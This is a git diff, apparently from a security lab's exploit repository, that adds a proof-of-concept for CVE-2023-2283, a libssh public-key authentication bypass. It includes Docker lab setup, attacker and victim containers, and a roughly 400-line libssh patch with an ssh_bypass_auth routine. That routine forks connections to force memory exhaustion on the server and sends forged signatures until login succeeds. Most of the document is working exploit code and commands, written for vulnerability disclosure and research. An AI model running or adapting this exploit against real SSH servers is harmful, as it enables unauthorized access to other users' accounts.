+  WriteBuf(uint8_t* buf, size_t bufsize) : buf_(buf), bufsize_(bufsize) {}
+
+  // Write a uint8_t to starting address &buf_[pos].
+  size_t write_uint8_at(size_t pos, uint8_t x);
+
+  // Write a uint16_t to starting address &buf_[pos] (in big endian
+  // order).
+  size_t write_uint16_at(size_t pos, uint16_t x);
+
+  // Write a uint32_t to starting address &buf_[pos] (in big endian
+  // order).
+  size_t write_uint32_at(size_t pos, uint32_t x);
+
+  // Write n copies of the byte x to starting address &buf_[pos].
+  size_t write_many_at(size_t pos, uint8_t x, size_t n);
+
+  // Write a block of n bytes to starting address &buf_[pos].
+  size_t write_bytes_at(size_t pos, const uint8_t* bytes, size_t n);
+
+  // Write a uint8_t to starting address &buf_[offset_].
+  void write_uint8(uint8_t x);
+
+  // Write a uint16_t to starting address &buf_[offset_] (in big endian
+  // order).
+  void write_uint16(uint16_t x);
+
+  // Write a uint32_t to starting address &buf_[offset_] (in big endian
+  // order).
+  void write_uint32(uint32_t x);
+
+  // Write n copies of the byte x to starting address &buf_[offset_].
+  void write_many(uint8_t x, size_t n);
+
+  // Write n bytes to starting address &buf_[offset_].
+  void write_bytes(const uint8_t* bytes, size_t n);
+
+  // Write a string to starting address &buf_[offset_].
+ void write_string(const char* str); + + size_t offset() const; + + // Inserts an n-byte gap, so that the bytes can be written later. This is + // usually used for size or offset fields that need to be calculated + // later. + size_t insert_gap(size_t n); + + void write_to_fd(int fd); +}; diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md new file mode 100644 index 0000000..6cfb209 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/README.md @@ -0,0 +1,104 @@ +# Public key authentication bypass in libssh (CVE-2023-2283) + +[CVE-2023-2283](https://securitylab.github.com/advisories/GHSL-2023-085_libssh/) +is an authentication bypass vulnerability in +[libssh](https://www.libssh.org/), which, under certain conditions, may +enable a remote attacker to gain unauthorized access to another user’s +account via ssh login. + +This demo uses docker to simulate two computers, named "libssh-server" +and "libssh-attacker". On libssh-server, we run `ssh_server_pthread`, +which is a simple ssh server application that is [included as an +example](https://gitlab.com/libssh/libssh-mirror/-/blob/e8322817a9e5aaef0698d779ddd467a209a85d85/examples/ssh_server.c) +with the libssh source code. The server is configured to allow public +key authentication with an ED25519 key, but the attacker does not know the +private key. The attacker instead authenticates by triggering the vulnerability. + +The vulnerability is triggered when `ssh_server_pthread` hits an +out-of-memory condition at precisely the right moment. If libssh is +running on a 64-bit server with plenty of RAM then it is very unlikely +that an attacker will be able to generate enough memory pressure to +cause an out-of-memory error, which means that the vulnerability is +unlikely to be exploitable. The goal of this demo is, instead, to show +that the vulnerability is exploitable if libssh is running in a +memory-constrained environment such as a [memory-constrained +container](https://docs.docker.com/config/containers/resource_constraints/), +which we believe is a realistic scenario for a real-life libssh deployment. +The demo uses `ulimit` to set a 256MB memory limit on the ssh server. + +## Network setup + +Create a docker network bridge, to simulate a network with two separate computers. + +``` +docker network create -d bridge --subnet 172.18.0.0/16 libssh-demo-network +``` + +## Server setup + +Build the docker image: + +``` +docker build server -t libssh-server --build-arg UID=`id -u` +``` + +Start the container: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 -it libssh-server +``` + +If you want to be able to debug the libssh server, then you need to start the container with some extra command line arguments: + +``` +docker run --rm --network libssh-demo-network --ip=172.18.0.10 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-server +``` + +Inside the container, run these commands to create ssh keys for the server: + +``` +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +``` + +Start the server: + +``` +ulimit -v 262144 # 256MB +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 +``` + +Note: ssh servers normally listen on port 22, but root privileges are required to listen on 22, so this demo uses port 2022 instead. 
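+To check that the server came up and is listening, note that `net-tools` is installed in the container, so something like the following should work from another terminal (2022 is the port number used above):
+
+```
+netstat -tlnp | grep 2022
+```
+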
Use `sudo` if you want to change the port number to 22. The `sudo` password in this docker container is "x".
+
+## Attacker setup
+
+Build the docker image:
+
+```
+docker build attacker -t libssh-attacker --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 -it libssh-attacker
+```
+
+If you want to be able to debug the client, then you need to start the container with some extra command line arguments:
+
+```
+docker run --rm --network libssh-demo-network --ip=172.18.0.11 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -it libssh-attacker
+```
+
+The attacker uses a modified version of libssh. The modifications are in the file named `diff.txt` and are applied during the `docker build` step.
+
+Run the malicious client like this:
+
+```
+~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub
+```
+
+The vulnerability is triggered when the ssh server has an out-of-memory error at exactly the right moment, which means that the PoC is unreliable. It runs in a loop until it's successful, which can often take several minutes. You may also need to run several instances of the PoC simultaneously to generate enough memory pressure on the server. I suggest using `tmux` to open three terminals and start three instances of the PoC. When one of the PoCs succeeds, it creates a file named "success.txt", which notifies the other instances that they should stop.
+
+Note: the PoC sometimes accidentally triggers a SIGSEGV in the server due to an unrelated [null-pointer dereference bug](https://gitlab.com/libssh/libssh-mirror/-/merge_requests/381). If this happens, you will need to restart the `ssh_server_pthread` process.
diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
new file mode 100644
index 0000000..21837c6
--- /dev/null
+++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/Dockerfile
@@ -0,0 +1,35 @@
+FROM ubuntu:22.04
+
+ENV DEBIAN_FRONTEND=noninteractive
+
+RUN apt-get update && \
+    apt-get install -y \
+    sudo tmux emacs git gdb cmake build-essential net-tools psmisc \
+    libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg
+
+ARG UID=1000
+
+# Create a non-root user account to run libssh.
+RUN adduser attacker --disabled-password --uid $UID
+
+# Grant the 'attacker' user sudo access. This is not used for the demo,
+# but it is often handy for installing extra packages.
+RUN adduser attacker sudo
+RUN echo "attacker:x" | chpasswd
+COPY home/ /home/attacker/
+RUN chown -R attacker:attacker /home/attacker
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker
+
+# Clone and build libssh v0.10.4
+RUN git clone https://git.libssh.org/projects/libssh.git && \
+    cd libssh && \
+    git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \
+    git apply ~/diff.txt && \
+    mkdir build && cd build && \
+    cmake ..
&& \ + make -j $(nproc) + +USER attacker diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history new file mode 100644 index 0000000..5df6160 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.bash_history @@ -0,0 +1 @@ +~/libssh/build/examples/ssh-client -p 2022 victim@172.18.0.10 ~/id_ed25519.pub diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. +set -g update-environment -r + +# history buffer size +set-option -g history-limit 100000 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt new file mode 100644 index 0000000..c56191d --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/diff.txt @@ -0,0 +1,399 @@ +diff --git a/examples/ssh_client.c b/examples/ssh_client.c +index aaf0cb5b..4055a2c5 100644 +--- a/examples/ssh_client.c ++++ b/examples/ssh_client.c +@@ -32,10 +32,12 @@ + #include + #endif + ++#include + #include + #include + #include + #include ++#include + + #include + #include +@@ -47,6 +49,7 @@ + + static char *host = NULL; + static char *user = NULL; ++static char *pubkey_filename = NULL; + static char *cmds[MAXCMD]; + static char *config_file = NULL; + static struct termios terminal; +@@ -89,7 +92,7 @@ static void add_cmd(char *cmd) + static void usage(void) + { + fprintf(stderr, +- "Usage : ssh [options] [login@]hostname\n" ++ "Usage : ssh [options] [login@]hostname pubkey_file\n" + "sample client - libssh-%s\n" + "Options :\n" + " -l user : log in as user\n" +@@ -134,12 +137,15 @@ static int opts(int argc, char **argv) + if (optind < argc) { + host = argv[optind++]; + } ++ if (optind < argc) { ++ pubkey_filename = argv[optind++]; ++ } + + while(optind < argc) { + add_cmd(argv[optind++]); + } + +- if (host == NULL) { ++ if (host == NULL || pubkey_filename == NULL) { + return -1; + } + +@@ -321,12 +327,27 @@ static void batch_shell(ssh_session session) + ssh_channel_free(channel); + } + +-static int client(ssh_session session) ++static void kill_procs(const int nprocs, pid_t *cpids) { ++ int i; ++ for (i = 0; i+1 < nprocs; i++) { ++ const pid_t cpid = cpids[i]; ++ if (cpid > 0) { ++ cpids[i] = -1; ++ kill(cpid, SIGTERM); ++ waitpid(cpid, 0, 0); ++ } ++ } ++} ++ ++static int client(ssh_session session, const int myid, const int nprocs, pid_t *cpids) + { +- int auth = 0; + char *banner; + int state; ++ int result; + ++ if (ssh_options_set(session, SSH_OPTIONS_COMPRESSION_C_S, "zlib") < 0) { ++ return -1; ++ } + if (user) { + if (ssh_options_set(session, SSH_OPTIONS_USER, user) < 0) { + return -1; +@@ -352,6 +373,7 @@ static int client(ssh_session session) + fprintf(stderr, "Connection failed : %s\n", ssh_get_error(session)); + return -1; + } ++ printf("connection successful: %d\n", myid); + + state = verify_knownhost(session); + if (state != 0) { +@@ -364,16 +386,21 @@ static 
int client(ssh_session session) + printf("%s\n", banner); + free(banner); + } +- auth = authenticate_console(session); +- if (auth != SSH_AUTH_SUCCESS) { ++ result = ssh_bypass_auth(session, pubkey_filename, myid, nprocs); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } ++ if (result < 0) { + return -1; ++ } else { ++ // Write a file named success.txt ++ close(open("success.txt", O_WRONLY | O_CREAT, S_IRUSR | S_IWUSR)); + } + if (cmds[0] == NULL) { + shell(session); + } else { + batch_shell(session); + } +- + return 0; + } + +@@ -406,9 +433,48 @@ static void cleanup_pcap(void) + pcap = NULL; + } + +-int main(int argc, char **argv) ++static int run(int argc, char **argv) + { + ssh_session session; ++ pid_t cpids[5]; ++ int result; ++ ++ // Fork a few times to increase the amount of memory pressure on the server. ++ const int nprocs = 1 + (rand() % (1 + sizeof(cpids)/sizeof(cpids[0]))); ++ int myid; ++ printf("nprocs = %d\n", nprocs); ++ for (myid = 1; myid < nprocs; myid++) { ++ struct timespec tm = {0}; ++ pid_t cpid = fork(); ++ if (cpid < 0) { ++ const int err = errno; ++ fprintf(stderr, "fork failed: %s\n", strerror(err)); ++ exit(EXIT_FAILURE); ++ } else if (cpid == 0) { ++ break; ++ } ++ ++ cpids[myid-1] = cpid; ++ // Short delay between each fork so that they don't all try to connect ++ // at once. ++ tm.tv_nsec = 1000000000L / 10; ++ nanosleep(&tm, 0); ++ } ++ if (myid == nprocs) { ++ myid = 0; ++ } else { ++ // Suppress output in the forks ++ const int stdin_new = open("/dev/null", O_RDONLY); ++ const int stdout_new = open("/dev/null", O_RDONLY); ++ const int stderr_new = open("/dev/null", O_RDONLY); ++ dup2(stdin_new, STDIN_FILENO); ++ dup2(stdout_new, STDOUT_FILENO); ++ dup2(stderr_new, STDERR_FILENO); ++ close(stdin_new); ++ close(stdout_new); ++ close(stderr_new); ++ } ++ printf("fork id %d\n", myid); + + ssh_init(); + session = ssh_new(); +@@ -427,7 +493,10 @@ int main(int argc, char **argv) + signal(SIGTERM, do_exit); + + set_pcap(session); +- client(session); ++ result = client(session, myid, nprocs, cpids); ++ if (myid == 0) { ++ kill_procs(nprocs, cpids); ++ } + + ssh_disconnect(session); + ssh_free(session); +@@ -435,5 +504,36 @@ int main(int argc, char **argv) + + ssh_finalize(); + +- return 0; ++ return result; ++} ++ ++int main(int argc, char **argv) ++{ ++ // Keep restarting the process until it's successful. 
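++    // Each iteration forks a child that makes one attempt: the child
++    // breaks out of the loop and calls run() below, while the parent
++    // waits and only stops looping once a child exits with EXIT_SUCCESS.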
++ while (1) { ++ const pid_t cpid = fork(); ++ if (cpid == 0) { ++ break; ++ } else if (cpid > 0) { ++ int wstatus = 0; ++ waitpid(cpid, &wstatus, 0); ++ if (WEXITSTATUS(wstatus) == EXIT_SUCCESS) { ++ return EXIT_SUCCESS; ++ } ++ } else { ++ return EXIT_FAILURE; ++ } ++ } ++ ++ if (open("success.txt", O_RDONLY) >= 0) { ++ printf("Stopping because a file named success.txt was found.\n"); ++ return EXIT_SUCCESS; ++ } ++ ++ srand(time(0)); ++ if (run(argc, argv) == 0) { ++ return EXIT_SUCCESS; ++ } else { ++ return EXIT_FAILURE; ++ } + } +diff --git a/include/libssh/libssh.h b/include/libssh/libssh.h +index 7857a77b..e79da840 100644 +--- a/include/libssh/libssh.h ++++ b/include/libssh/libssh.h +@@ -508,6 +508,9 @@ LIBSSH_API void ssh_disconnect(ssh_session session); + LIBSSH_API char *ssh_dirname (const char *path); + LIBSSH_API int ssh_finalize(void); + ++LIBSSH_API int ssh_bypass_auth(ssh_session session, const char* pubkey_filename, const int myid, const int nprocs); ++ ++ + /* REVERSE PORT FORWARDING */ + LIBSSH_API ssh_channel ssh_channel_open_forward_port(ssh_session session, + int timeout_ms, +diff --git a/src/client.c b/src/client.c +index a35a28e1..e2facc4a 100644 +--- a/src/client.c ++++ b/src/client.c +@@ -24,6 +24,7 @@ + #include "config.h" + + #include ++#include + + #ifndef _WIN32 + #include +@@ -46,6 +47,7 @@ + #include "libssh/misc.h" + #include "libssh/pki.h" + #include "libssh/kex.h" ++#include "libssh/string.h" + + #define set_status(session, status) do {\ + if (session->common.callbacks && session->common.callbacks->connect_status_function) \ +@@ -834,6 +836,138 @@ error: + } + } + ++static int send_service_request(ssh_session session, ssh_string str, bool set_wontblock) { ++ ssh_buffer_pack(session->out_buffer, "bS", SSH2_MSG_SERVICE_REQUEST, str); ++ if (set_wontblock) { ++ ssh_socket_set_write_wontblock(session->socket); ++ } ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ printf("Sending SSH2_MSG_UNIMPLEMENTED failed.\n"); ++ return -1; ++ } ++ return 0; ++} ++ ++int ssh_bypass_auth(ssh_session session, const char *pubkey_filename, const int myid, const int nprocs) { ++ struct ssh_crypto_struct *crypto = ssh_packet_get_current_crypto(session, SSH_DIRECTION_BOTH); ++ size_t i, n; ++ int rc; ++ int result = -1; ++ ++ if (myid > 0) { ++ size_t sizes[5] = {0x40000 - 5, 0x40000 - 5, 0x40000 - 5, 0x4000 - 5, 0xf00 - 5}; ++ ssh_string str; ++ sleep(1); ++ assert(myid <= sizeof(sizes)/sizeof(sizes[0])); ++ const size_t slen = sizes[myid-1]; ++ printf("slen = %lx\n", slen); ++ str = ssh_string_new(slen); ++ // note: ssh_string has a length field, so you don't have to nul-terminate them. ++ memset(ssh_string_data(str), 'x', slen); ++ for (i = 0; i < 192; i++) { ++ if (send_service_request(session, str, i >= 0) < 0) { ++ return result; ++ } ++ } ++ ssh_string_free(str); ++ pause(); ++ } else { ++ const char *sig_type_c = NULL; ++ ssh_key pubkey = NULL; ++ ssh_string pubkey_s = NULL; ++ ++ ssh_pki_import_pubkey_file(pubkey_filename, &pubkey); ++ ssh_pki_export_pubkey_blob(pubkey, &pubkey_s); ++ ++ sig_type_c = ssh_key_get_signature_algorithm(session, pubkey->type); ++ printf("sig_type_c = %s\n", sig_type_c); ++ sleep(2); ++ for (i = 0; i < 100 && result < 0; i++) { ++ ssh_string username; ++ ssh_string service; ++ ssh_string algo; ++ ++ // 0x37 is the maximum string length that will fit in an 0x40-sized malloc chunk. 
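++        // (The string sizes grow with each retry, presumably so that
++        // successive attempts exercise slightly different heap layouts
++        // on the server.)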
++ username = ssh_string_new(0x37 + i * 0x400); ++ memset(ssh_string_data(username), 0, ssh_string_len(username)); ++ if (ssh_string_fill(username, session->opts.username, strlen(session->opts.username)) < 0) { ++ printf("username is too long: %s\n", session->opts.username); ++ return result; ++ } ++ service = ssh_string_new(0x37 + i * 0x500); ++ memset(ssh_string_data(service), 0, ssh_string_len(service)); ++ ssh_string_fill(service, "ssh-connection", 15); ++ algo = ssh_string_new(1); ++ memset(ssh_string_data(algo), 'x', ssh_string_len(algo)); ++ printf("send userauth 0\n"); ++ ssh_buffer_pack(session->out_buffer, "bSSsbSS", ++ SSH2_MSG_USERAUTH_REQUEST, ++ username, ++ service, ++ "publickey", ++ 1, /* private key */ ++ algo, ++ pubkey_s /* public key */ ++ ); ++ ssh_string_free(username); ++ ssh_string_free(service); ++ ssh_string_free(algo); ++ ++ ssh_string fakesig = ssh_string_new(90 /*i == 0 ? 400 : 0x400 * i*/); ++ memset(ssh_string_data(fakesig), 'x', ssh_string_len(fakesig)); ++ ssh_string sigtype = ssh_string_from_char(sig_type_c); ++ size_t sigtypelen = ssh_string_len(sigtype) + sizeof(uint32_t); ++ ssh_string payload = ssh_string_new(ED25519_SIG_LEN); ++ memcpy(ssh_string_data(payload), "kevwozere", 10); ++ size_t payloadlen = ssh_string_len(payload) + sizeof(uint32_t); ++ assert(sigtypelen + payloadlen <= ssh_string_len(fakesig)); ++ memcpy(ssh_string_data(fakesig), sigtype, sigtypelen); ++ memcpy((char*)ssh_string_data(fakesig) + sigtypelen, payload, payloadlen); ++ ssh_string_free(sigtype); ++ ssh_string_free(payload); ++ ssh_buffer_pack(session->out_buffer, "S", fakesig); ++ ssh_string_free(fakesig); ++ session->auth.service_state = SSH_AUTH_SERVICE_SENT; ++ session->auth.current_method = SSH_AUTH_METHOD_PUBLICKEY; ++ session->auth.state = SSH_AUTH_STATE_PUBKEY_AUTH_SENT; ++ session->pending_call_state = SSH_PENDING_CALL_AUTH_PUBKEY; ++ ++ printf("out_buf size: %x\n", ssh_buffer_get_len(session->out_buffer)); ++ if (ssh_packet_send(session) == SSH_ERROR) { ++ ssh_set_error(session, SSH_FATAL, ++ "Sending SSH2_MSG_UNIMPLEMENTED failed."); ++ return result; ++ } ++ printf("send userauth 1\n"); ++ ++ // If the userauth message was unsuccessful then we don't get ++ // a reply from the server. So we send a short service request ++ // message, which will get a reply. Then we can tell from ++ // which type of reply we receive whether the userauth was ++ // successful. 
++ { ++ ssh_string str = ssh_string_from_char("x"); ++ if (send_service_request(session, str, true) < 0) { ++ return result; ++ } ++ ssh_string_free(str); ++ } ++ ++ rc=ssh_handle_packets_termination(session,SSH_TIMEOUT_USER, ++ ssh_service_request_termination, session); ++ printf("rc = %d\n", rc); ++ if (session->auth.state == SSH_AUTH_STATE_SUCCESS) { ++ result = 0; ++ } ++ } ++ ssh_string_free(pubkey_s); ++ ssh_key_free(pubkey); ++ } ++ return result; ++} ++ + const char *ssh_copyright(void) + { + return SSH_STRINGIFY(LIBSSH_VERSION) " (c) 2003-2022 " +diff --git a/src/libssh.map b/src/libssh.map +index eeb625c5..f20d89b9 100644 +--- a/src/libssh.map ++++ b/src/libssh.map +@@ -188,6 +188,7 @@ LIBSSH_4_5_0 # Released + ssh_connector_set_out_channel; + ssh_connector_set_out_fd; + ssh_copyright; ++ ssh_bypass_auth; + ssh_dirname; + ssh_disconnect; + ssh_dump_knownhost; diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/attacker/home/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile new file mode 100644 index 0000000..97d50ea --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/Dockerfile @@ -0,0 +1,35 @@ +FROM ubuntu:22.04 + +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update && \ + apt-get install -y \ + sudo tmux emacs git gdb cmake build-essential net-tools psmisc \ + libssl-dev zlib1g-dev libkrb5-dev libkrb5-dbg \ + libc6-dbg + +ARG UID=1000 + +# Create a non-root user account to run libssh. +RUN adduser victim --disabled-password --uid $UID + +# Grant the 'victim' user sudo access. This is not used for the demo, +# but it is often handy for installing extra packages. +RUN adduser victim sudo +RUN echo "victim:x" | chpasswd +COPY home/ /home/victim/ +RUN chown -R victim:victim /home/victim + +# Switch over to the 'victim' user, since root access is no longer required +USER victim +WORKDIR /home/victim + +# Clone and build libssh v0.10.4 +RUN git clone https://git.libssh.org/projects/libssh.git && \ + cd libssh && \ + git checkout e8322817a9e5aaef0698d779ddd467a209a85d85 && \ + mkdir build && cd build && \ + cmake .. 
&& \ + make -j $(nproc) + +USER victim diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history new file mode 100644 index 0000000..d291675 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.bash_history @@ -0,0 +1,5 @@ +mkdir ~/testkeys +ssh-keygen -P "" -t ecdsa -f ~/testkeys/id_ecdsa +ssh-keygen -P "" -t rsa -f ~/testkeys/id_rsa +ulimit -v 262144 +~/libssh/build/examples/ssh_server_pthread -p 2022 -r ~/testkeys/id_rsa -e ~/testkeys/id_ecdsa -a ~/.ssh/authorized_keys 0.0.0.0 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/authorized_keys @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub new file mode 100644 index 0000000..1ecefa0 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_ed25519.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDG8eH3ZcBaTcwg/Gclb+ZYWZRQh9RvHQnQNY/lIa8mW victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub new file mode 100644 index 0000000..7efed1a --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.ssh/id_rsa.pub @@ -0,0 +1 @@ +ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDVIGdVtCjMEzzbewMED01wAqaBcU6HytjUJoZt9Cm3lS0C691ZPayL14aj5uC9H73JDAabl58IEy6k++Wb5ryp74pozZ/H3swAuJlBidbeAUjtQbM5cxBT9hO7XE9YdHTXLzmVSF2NzyTt2HSZJPpYKsh0k7O56kfk/DfrIU7qGcIoDTNgK8zErXN2CjQ0dqm/sDZP1rxfHOfvLvTKx3WA30ko9c+zrIEJZ9pHV/OALOxPHf4WDewsMH3g1nG52hei2NG6r8nLP4BSEKcTbrebI6/RKOfXaFROMN01g9SY6Y0XmG0vAsyyRw0+oJMKAaoYgtokfBbJUJRtZ3uFavcA1DGRYn1Kswbwg+ZWMYoPRTTJ/Hzl8DqViWUOdsu9kHm24orPJZEajAo6kvjEjUQj2CKMbUVbxYB54S+taSXDhbeYWx1hACN/L8FufLdtW2veeuUOKJ0MtOMRCu5uCvLI7Y2wI6xxGa3jHOap81jyNa1vuMYfkk1z3jk5Ol5rlKE= victim@b1b586610139 diff --git a/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf new file mode 100644 index 0000000..f2da785 --- /dev/null +++ b/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283/server/home/.tmux.conf @@ -0,0 +1,11 @@ +# Enable 256 colors +set -g default-terminal "screen-256color" + +# Enable using the mouse to switch windows. +set -g mouse on + +# Don't lose track of SSH_AGENT etc. from parent environment. 
+set -g update-environment -r
+
+# history buffer size
+set-option -g history-limit 100000
diff --git a/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse b/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
index 0d28bdc..8d73dbe 160000
--- a/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
+++ b/SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
@@ -1 +1 @@
-Subproject commit 0d28bdc3ba1c6c4e69e125aa394eddd6edb7622f
+Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975
diff --git a/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse b/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse
index b2c75ca..8d73dbe 160000
--- a/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse
+++ b/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse
@@ -1 +1 @@
-Subproject commit b2c75caace13d54303581a71f72c83bb5239b3a2
+Subproject commit 8d73dbeafd857207bfd76b10ec74b5cc382e1975
diff --git a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
index fe05459..989f3aa 100644
--- a/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
+++ b/SecurityExploits/rsyslog/CVE-2018-1000140_snprintf_librelp/README.md
@@ -2,4 +2,4 @@
 This directory contains a proof-of-concept exploit for a remote code execution vulnerability in [librelp](https://www.rsyslog.com/librelp/). The vulnerability was fixed in librelp version [1.2.15](https://www.rsyslog.com/librelp-1-2-15/), released on 2018-03-22.
 
-For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and on the [LGTM blog](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140).
+For more information about the vulnerability and for instructions on how to run the proof-of-concept exploit, please see our blog post, which is published on both [Rainer Gerhards's blog](https://rainer.gerhards.net/how-we-found-and-fixed-cve-in-librelp) and the [GitHub Security Lab blog](https://securitylab.github.com/research/librelp-buffer-overflow-cve-2018-1000140/).